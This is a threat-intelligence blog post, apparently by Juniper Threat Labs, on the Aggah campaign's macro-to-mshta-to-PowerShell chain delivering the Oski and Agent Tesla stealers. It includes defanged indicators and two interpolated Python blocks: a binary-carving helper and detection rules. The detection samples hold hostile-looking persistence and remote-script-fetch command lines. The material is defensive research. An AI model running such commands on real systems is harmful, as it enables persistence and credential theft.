September 8, 2021
Aggah Malware Campaign Expands to Zendesk and GitHub to Host Its Malware
blogs.juniper.net/en-us/security/aggah-malware-campaign-expands-to-zendesk-and-github-to-host-its-malware

Juniper Threat Labs has detected a new development in the Aggah malware campaign. Previously, Aggah was known to be using legitimate infrastructure such as BlogSpot, WordPress and Pastebin to host its malware. Recently, we discovered an ongoing campaign where Aggah threat actors host their malware using Zendesk attachments and GitHub. This campaign delivers several types of malware focused on stealing sensitive information, such as usernames and passwords, credit card information stored in browsers, and crypto wallets.

We detected a malicious Microsoft PowerPoint sample, ed70f584de47480ee706e2f6ee65db591e00a114843fa53c1171b69d43336ffe, which was downloaded from Zendesk's own infrastructure as an attachment:

http://p17[.]zdusercontent[.]com/attachment/9061705/eyckz3zuedoivxtp0i629aoxe

The PowerPoint document contains a malicious macro that connects to a shortened bitly.com URL, which expands to https://mujhepyaslagihaimujhepanipilao[.]blogspot[.]com/p/mark2html, in order to download and execute a malicious script via mshta.exe.

Fig. 1. The VB script in the .ppt executes another script from bitly.com using mshta.

Fig. 2. The bitly URL expands to https://mujhepyaslagihaimujhepanipilao[.]blogspot[.]com/p/mark2html

The script, mark2.html, hosted on mujhepyaslagihaimujhepanipilao[.]blogspot[.]com, performs a series of operations: creating a Run entry in the registry to execute a PowerShell script, downloading and executing another script using a scheduled task, and using WMI from the registry Run key to download and execute yet another script.

Fig. 3. Series of operations done by mark2.html

The code shown in Figure 3 downloads the scripts at the following links and executes them:

https://ia801405us[.]archive[.]org/11/items/pg_20210716/blessed.txt
https://randikhanaekminar[.]blogspot[.]com/p/elevatednew1.html
https://backbones1234511a[.]blogspot[.]com/p/elevatednew1backup.html
https://startthepartyup[.]blogspot.com/p/backbone15.html
https://ghostbackbone123[.]blogspot.com/p/ghostbackup14.html

Blessed.txt

The PowerShell script is hosted on archive.org as blessed.txt. It loads a stealer malware known as Oski. The Oski binary is included in the PowerShell script as a hex-encoded string. The script uses a technique known as signed binary execution via RegSvcs.exe, together with .NET Assembly.Load, to load this binary; this serves as an added layer of protection, since the binary is never saved to disk and only stays in memory.

Fig. 4. Blessed.txt is a PowerShell script that contains a Windows executable, which it loads via RegSvcs.exe

Oski was first seen in 2019. Today, it is sold on Russian hacking forums for $70-$100. Oski malware's capabilities include:

- Stealing cryptocurrency wallets
- Stealing sensitive information stored in browsers, such as credit card data, autofill data and cookies
- Stealing credentials from various applications, such as FTP, VPN and web browsers
- Capturing screenshots
- Collecting system information
- Downloading and installing additional malware

Fig. 5. Oski code that steals crypto and browser data

Oski connects to the following C2 server: 103.153.76.164

After it collects and exfiltrates the data, it deletes traces of itself from the system.

Elevatednew1.html

One other routine that we listed above in Fig. 3 creates a scheduled task to download and execute another malicious script, hosted at https://randikhanaekminar[.]blogspot[.]com/p/elevatednew1.html. This malicious script loads another PowerShell script, also named blessed.txt.
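The blessed.txt loader described above embeds a Windows executable as a hex string and hands it to .NET Assembly.Load. The following triage helper, added here as an illustration and not code from the post or from Juniper, carves long hex runs out of a PowerShell script, validates the MZ/PE headers, and reports a SHA-256 for each embedded binary so it can be compared against IOC lists. The sample script and its fake PE header are constructed for the demonstration; the variable names in it are assumptions, not the real loader's.

```python
import hashlib
import re

# Constructed stand-in for a blessed.txt-style loader. The hex blob is a
# minimal fake PE header (DOS stub + "PE\0\0" signature), not a real binary.
FAKE_PE = (b"MZ" + b"\x90" * 58            # DOS header padding up to e_lfanew
           + (0x40).to_bytes(4, "little")  # e_lfanew -> PE signature at 0x40
           + b"PE\x00\x00" + b"\x00" * 20)
SAMPLE_SCRIPT = (
    "$h = '" + FAKE_PE.hex().upper() + "'\n"
    "$b = New-Object byte[] ($h.Length / 2)\n"
    "for ($i = 0; $i -lt $h.Length; $i += 2) {"
    " $b[$i / 2] = [Convert]::ToByte($h.Substring($i, 2), 16) }\n"
    "[System.Reflection.Assembly]::Load($b) | Out-Null\n"
    "$host_bin = 'C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe'\n"
)

HEX_RUN = re.compile(r"[0-9A-Fa-f]{64,}")  # ignore short hex such as GUID parts
LOADER_MARKERS = ("Assembly]::Load", "Assembly.Load", "RegSvcs.exe")

def carve_hex_blobs(script):
    """Decode every long, even-length hex run in the script to bytes."""
    return [bytes.fromhex(m.group(0)) for m in HEX_RUN.finditer(script)
            if len(m.group(0)) % 2 == 0]

def is_pe(data):
    """Check the MZ magic and follow e_lfanew to the PE\\0\\0 signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def triage(script):
    """Report embedded PEs (with SHA-256 for IOC matching) and loader markers."""
    pes = [b for b in carve_hex_blobs(script) if is_pe(b)]
    return {
        "pe_sha256": [hashlib.sha256(b).hexdigest() for b in pes],
        "pe_sizes": [len(b) for b in pes],
        "markers": [m for m in LOADER_MARKERS if m in script],
    }

if __name__ == "__main__":
    print(triage(SAMPLE_SCRIPT))
```

Carved binaries can be written out for static analysis in a sandbox; the hash is what you would match against the IOC section below.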
This time, the script is hosted on GitHub:

https://raw[.]githubusercontent[.]com/manasshole/newone/main/blessed.txt

Fig. 6. Script code inside elevatednew1.html executes a PowerShell script hosted on GitHub.com

The malware that it tries to install is Agent Tesla, a .NET keylogger and RAT that logs keystrokes and the host's clipboard content.

The other malicious scripts, backbone15.html and ghostbackup14.html, are no longer available for download, while elevatednew1backup.html is identical to elevatednew1.html.

Before publication of this blog, we contacted Zendesk and GitHub, and they quickly responded to disable the hosted malware.

Conclusion

The threat actors' primary goal is to steal sensitive information such as usernames and passwords, credit cards and crypto wallets. On the surface, this may seem to have a low impact in comparison with ransomware operations targeting enterprises. However, the Aggah threat actors' method of using legitimate infrastructure is worrisome. As a defender, one way to disrupt malicious activity is to detect the attackers' infrastructure. This is usually effective, as it is not that easy to change infrastructure. As we have observed and noted, threat actors using GitHub, Archive.org, Zendesk, Pastebin and Google Drive are not going away anytime soon, and we expect their malicious efforts to continue. For instance, Juniper Threat Labs has also seen growing usage of Zendesk to host malware, which may warrant its own blog in the future.
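Because the hosting infrastructure sits on legitimate services, endpoint telemetry is the other place to catch this chain. The rules below, added here as an example and not Juniper's detection content, encode the stages the post describes (Office spawning mshta with a URL, a Run key pointing at PowerShell, a scheduled task that fetches a remote script, and PowerShell launching RegSvcs.exe) and run them over constructed Sysmon-style process-creation events. The command lines, paths and task names are placeholders modelled on the post, not captured data.

```python
import re

# Constructed process-creation events in a Sysmon-like shape; the command
# lines are placeholders modelled on the chain in the post, not captured data.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://bit.ly/PLACEHOLDER-SHORTLINK"},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run '
                r'/v Updater /d "powershell -w hidden -ep bypass -c <PLACEHOLDER>"'},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /sc minute /mo 60 /tn Sync '
                '/tr "mshta https://stage.example.invalid/p/elevatednew1.html"'},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": "RegSvcs.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe report.txt"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://\S+", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return the names of the chain stages this one event matches."""
    parent, image = basename(ev["parent"]), basename(ev["image"])
    cmd = ev["cmdline"].lower()
    hits = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office-spawns-script-host")   # macro -> mshta
    if image == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta-remote-url")            # fetch via bitly/blogspot
    if image == "reg.exe" and "currentversion\\run" in cmd and "powershell" in cmd:
        hits.append("run-key-powershell")          # registry Run persistence
    if image == "schtasks.exe" and "/create" in cmd and URL_RE.search(cmd):
        hits.append("schtasks-remote-script")      # scheduled-task stage
    if parent == "powershell.exe" and image == "regsvcs.exe":
        hits.append("powershell-spawns-regsvcs")   # signed-binary loader
    return hits

def scan(events):
    """Flatten alerts as (event index, stage name) tuples."""
    return [(i, h) for i, ev in enumerate(events) for h in classify(ev)]
```

Any single hit is worth a look, but two or more stages on the same host within a few minutes is the pattern this campaign produces.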
In this particular case, Juniper Networks' Advanced Threat Prevention (ATP) solution detects the Aggah malware file as follows:

https://www.juniper.net/us/en/products/security/advanced-threat-prevention.html

IOC

ed70f584de47480ee706e2f6ee65db591e00a114843fa53c1171b69d43336ffe
103[.]153[.]76[.]164
https://raw[.]githubusercontent[.]com/manasshole/newone/main/blessed.txt
http://p17[.]zdusercontent[.]com/attachment/9061705/eyckz3zuedoivxtp0i629aoxe
https://ia801405us[.]archive[.]org/11/items/pg_20210716/blessed.txt
https://randikhanaekminar[.]blogspot[.]com/p/elevatednew1.html
https://backbones1234511a[.]blogspot[.]com/p/elevatednew1backup.html
https://startthepartyup[.]blogspot.com/p/backbone15.html
https://ghostbackbone123[.]blogspot.com/p/ghostbackup14.html